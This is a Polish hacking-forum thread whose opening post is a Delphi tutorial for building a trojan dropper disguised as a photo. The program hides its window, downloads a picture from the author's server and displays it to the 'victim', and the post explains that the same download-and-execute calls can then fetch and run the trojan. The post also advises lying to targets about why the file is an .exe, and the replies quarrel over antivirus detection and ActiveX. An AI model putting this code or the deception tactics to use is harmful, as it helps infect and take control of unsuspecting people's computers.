[TUT] *.exe jako *.jpg

nitr0

Użytkownik
Dołączył
Maj 15, 2007
Posty
537
Nie chciało mi się iść do szkoły to postanowiłem zrobić coś "pożytecznego" i napisać jakiegoś tutka, tylko że nie miałem za bardzo pomysłów, więc napisałem takie o byle jajco xD
Ekhm.. od czego by tu zacząć.. Zapewne większość z szanujących się użytkowników trojanów pobranych z sieci dniami i nocami szuka po internecie bindera który by jako plik *.jpg wsadził doń serwer krwiożerczego trojana.. Otóż drodzy chakierzy.. muszę Was niestety zmartwić. To jest tak bardzo wykonalne jak przejęcie całkowitej kontroli nad czyimś komputerem znając IP (co jest też często Waszym karierowym celem). Więc jakby to ... !! N.I.E. D.A. S.I.Ę. !! Chyba dość jasno to ująłem
<
Ale za to jest kilka sposobów żeby wymigać się od niezręcznego tłumaczenia ofierze po otwarciu serwerku trojana "Czemu się nic nie otwiera?". Jako żeby uchronić Was od usuwania Waszych tematów z treścią o jakiej wspomniałem wcześniej postanowiłem troszku pomóc. Efektem będzie to, że gdy ofiara otworzy plik wykonywalny to otworzy mu się zdjęcie. Czyli unikniemy co najwyżej tłumaczenia się
smile.gif
co prawda jakieś tam zdolności socjotechniczne się przydadzą bo jakoś tego exe`ka trzeba wytłumaczyć
<
ale to najmniejszy problem. Powstały program będzie oparty o URLmon więc będzie wykrywany jako tzw "Downloader" co też będzie prawdą xD ale to pozostawiam już Wam. Z pewnością nie jeden z Was będzie się upierał że to kompletnie niepotrzebne, bo przecież można to zrobić zasobami - oooczywiście, ale należę do osób które wolą napisać 2 linijki niebezpieczne zamiast 100 bezpieczniejszych aby uzyskać ten sam efekt
<
Do rzeczy. Jako że jest to dział Delphi to przydałby się kompilatorek no i podstawowe zdolności myślenia. Oprócz tego potrzebne nam będzie konto na jakimś serwerze ftp
smile.gif

Dość ważna informacja : to nie będzie żaden binder czy cham wie co jeszcze tylko fragmencik kodu serwera trojana, lub downloadera który by takowego pobrał z neta

Let`s gooo!

Otwieramy kompilator. File->New->Application. Zakładam że podstawową chociaż wiedzę macie w temacie więc pozwólcie że ominę szczegóły szczegółów
<
w onCreate Formy wklikujemy :
Kod:
Application.ShowMainForm := false;
nie trzeba znać Delphi żeby skumać o co cho. No ale - kod odpowiedzialny jest za ukrycie formy przed naszymi cudnymi oczami
smile.gif


Teraz chwila relaksu - wrzucamy na serwer FTP jakiś tam obrazek, który otworzy się po otwarciu programu. Załóżmy że nazywa się spocona_w_lodowce.jpg

Dodajemy do uses URLmon oraz ShellApi. Następnie, również w onCreate Formy, dopisujemy :
Kod:
try
URLDownloadToFile(nil, '[url]http://www.nasz.serwer.pl/spocona_w_lodowce.jpg'[/url], PChar('c:\pykczer.jpg'),0, nil);
finally
ShellExecute(0,'open','c:\pykczer.jpg',nil,nil,SW_SHOW);
end;
TADAA! To by było na tyle (dlatego śmieszy mnie nazwa tutorial XD)
Juuuż tłumaczę ten kodzik:
try finally end - tłumaczył nie będę bo podstawy miały być opanowane
<


Tajemniczy URLDownloadToFile - hmm tu też znający język angliński powinni dać sobie radę z rozkminieniem tejże funkcji xP funkcja ta jest zaimplementowana w bibliotece URLMon którą dodaliśmy na początku. Ta funkcja jest odopowiedzialna za pobranie z internetu strony i zapisania go na dysku. My wykorzystaliśmy ją do pobrania zdjęcia z serwera, które potem zapisaliśmy na dysku C pod nazwą pykczer.jpg. To by było na tyle o tej funkcji.

ShellExecute tak naprawdę nie ma nic wspólnego ze stacją paliw (reklamaaa xD) Wraz z opcją 'open' jest odopwiedzialna za (trudno się domyśleć) otwarcie pliku po prostu xP więc to co wklikaliśmy najzwyczajniej w świecie ściąga zdjątko z naszego serwera i odpala go ofierze dając złudzenie że to to tylko niewinne zdjęcie spoconej w lodówce xP a tu ciaaach - wejście smoka - trojan przejął kontrolę nad kompem xD oczywiście nazwa projektu też musi się nazywać spocona_w_lodówce żeby było to jak najbardziej prawdopodobne xP
jeszcze może wtrące słówko co do wytłumaczenia rozszerzenia... naprawde opcji wytłumaczenia są miliony milionów, ale ja zazwyczaj mówie że skompresowałem zdjęcie jakimś tam kompresorem o koreansko-chinskiej nazwie żeby mniej ważyło albo żeby szybciej wysłać xD jeśli dasz jakąkolwiek sensowną odpowiedź na pytanie "Dlaczego exe?" to nikt się do tego za bardzo nie będzie przyczepiał
<
człowiek po prostu potrzebuje odpowiedzi. Jakbyś sie zastanawiał co odpowiedzieć na to pytanie to na pewno by tego nie otworzył xD spryt to podstawa w życiu xP

dys ys di end xP
Jak wspomniałem wcześniej, może to być cząstka trojana która po prostu będzie odpowiedzialna za pokazanie zdjęcia a tak naprawdę odpalenia trojana, ale może być też użyta jako program który pobierze zdjęcie, wyświetli je oraz dopiero wtedy pobierze z serwera serwer trojana również przez URLDownloadToFile oraz odpali poprzez ShellExecute tak jak to zrobiliśmy ze zdjęciem
smile.gif
Ja tylko podsunąłem pomysł co by zrobić żeby zamieszać ze zdjęciem xD

Musiałem pousuwać troche emotikon, bo mają tutaj ograniczenie xD A ja tak je luuubie xD


niemile widziane karcące komentarze xD toż to pisane z troski ^^ xP
 

djmentos

Użytkownik
Dołączył
Maj 1, 2007
Posty
1868
Smark: to poradnik. Jeśli ktoś potrafi to sobie zrobi bez formy.
NIE KARMMY TROLLI!

Gdy by każdy "profesjonalista" od trojanów przeczytałby chociaz jedną ksiązkę trojany zamiast 1,5mb zajmowały by 600kB
 

nitr0

Użytkownik
Dołączył
Maj 15, 2007
Posty
537
miałem nie wspominać o formie w ogóle. ale pomyślałem sobie że jak się dopadnie taki ktoś na prawdę niepoinformowany to lepiej żeby było
<
Smark,poradnik nie był pisany pod Ciebie i Twoje umiejętności tylko pod "szaraki" x) oczywiście że nie potrzebna ta forma, ale z założenia ma to być propozycja jak skombinować żeby odpalał się jakiś syf "jako zdjęcie"
<
 

nitr0

Użytkownik
Dołączył
Maj 15, 2007
Posty
537
sorki za odkopanie, ale Smark co Ci w tym nie pasowało?
Otwieramy kompilator. File->New->Application.[/b]
smile.gif


// kurde, nie zedytowałem ;/ sorki, niech jakiś modek to podklei pod wcześniejszy post
<
 

PaPaDo

Użytkownik
Dołączył
Styczeń 27, 2007
Posty
66
ta.. URLDownloadToFile, ShellExecute - wykrywalność praktycznie 100%, AV rozpozna jako downloadera.
 

nitr0

Użytkownik
Dołączył
Maj 15, 2007
Posty
537
Powstały program będzie oparty o URLmon więc będzie wykrywany jako tzw "Downloader" co też będzie prawdą xD ale to pozostawiam już Wam. Z pewnością nie jeden z Was będzie się upierał że to kompletnie niepotrzebne, bo przecież można to zrobić zasobami - oooczywiście, ale należę do osób które wolą napisać 2 linijki niebezpieczne zamiast 100 bezpieczniejszych aby uzyskać ten sam efekt[/b]
 

emilianx

Użytkownik
Dołączył
Czerwiec 16, 2006
Posty
14
<div class='quotetop'>CYTAT(h4ck3r15 @ 16.06.2008, 9:56) <{POST_SNAPBACK}></div>
Nie chciało mi się iść do szkoły to postanowiłem zrobić coś "pożytecznego" i napisać jakiegoś tutka, tylko że nie miałem za bardzo pomysłów, więc napisałem takie o byle jajco xD
Ekhm.. od czego by tu zacząć.. Zapewne większość z szanujących się użytkowników trojanów pobranych z sieci dniami i nocami szuka po internecie bindera który by jako plik *.jpg wsadził doń serwer krwiożerczego trojana.. Otóż drodzy chakierzy.. muszę Was niestety zmartwić. To jest tak bardzo wykonalne jak przejęcie całkowitej kontroli nad czyimś komputerem znając IP (co jest też często Waszym karierowym celem). Więc jakby to ... !! N.I.E. D.A. S.I.Ę. !! Chyba dość jasno to ująłem
<
[/b]


Zaczynam wątpić w kompetencję użytkowników tego forum. Czytam coraz więcej postów i dochodzę do wniosku, że większość, to bezużyteczne brednie.
CZŁOWIEKU !!!! Jeśli chodzi o przejęcie pełnej kontroli nad kompem znając IP ????? To nie wiesz, że pełną kontrolę można przejąc korzystając ze zwykłej przeglądarki przy użyciu ActiveX lub NTRSupport ????

Źle się dzieje, bardzo źleeeeee
<
 

djmentos

Użytkownik
Dołączył
Maj 1, 2007
Posty
1868
mowisz o sobie? ;D

ActiveX jest to dodatek do przeglądarki internetowej uruhamiany po stronie użytkownika.
I co ty chcesz zdziałać? Wstawisz ActiveX - Wirusa na swojej stronie i dasz linka?

Poświęciłem na taki numer prawie 2 tygodnie. Ponad 500 zmian w kodzie i w aplikacji.

DOPÓKI NIE PODPISZESZ CYFROWO KONTROLKI nie zostanie ona automatycznie zainstalowana.

A co zdziałać można z IP to pisałem już arta. Albo dwa nawet ^^.
 

nitr0

Użytkownik
Dołączył
Maj 15, 2007
Posty
537
emilianx, nie sraj mi tu o ActiveX skoro nie wspomniałem o tym nawet słowa - napisałem o samej znajomości IP! przeliterować ci, to może lepiej przeczytasz : s-a-m-e-j z-n-a-j-o-m-o-ś-c-i I-P !! a jedno z drugim mało ma wspólnego. dlatego proszę : WŁAM MI SIĘ NA KOMPA ZNAJĄC MOJE IP! dawaj. wiernie czekam
<
 

emilianx

Użytkownik
Dołączył
Czerwiec 16, 2006
Posty
14
jak to miło, że jest jeszcze tylu ludzi nieświadomych działania kontrolki ActiveX w Explorerze.
smile.gif
a w FF - NTRSupport
 
Do góry Bottom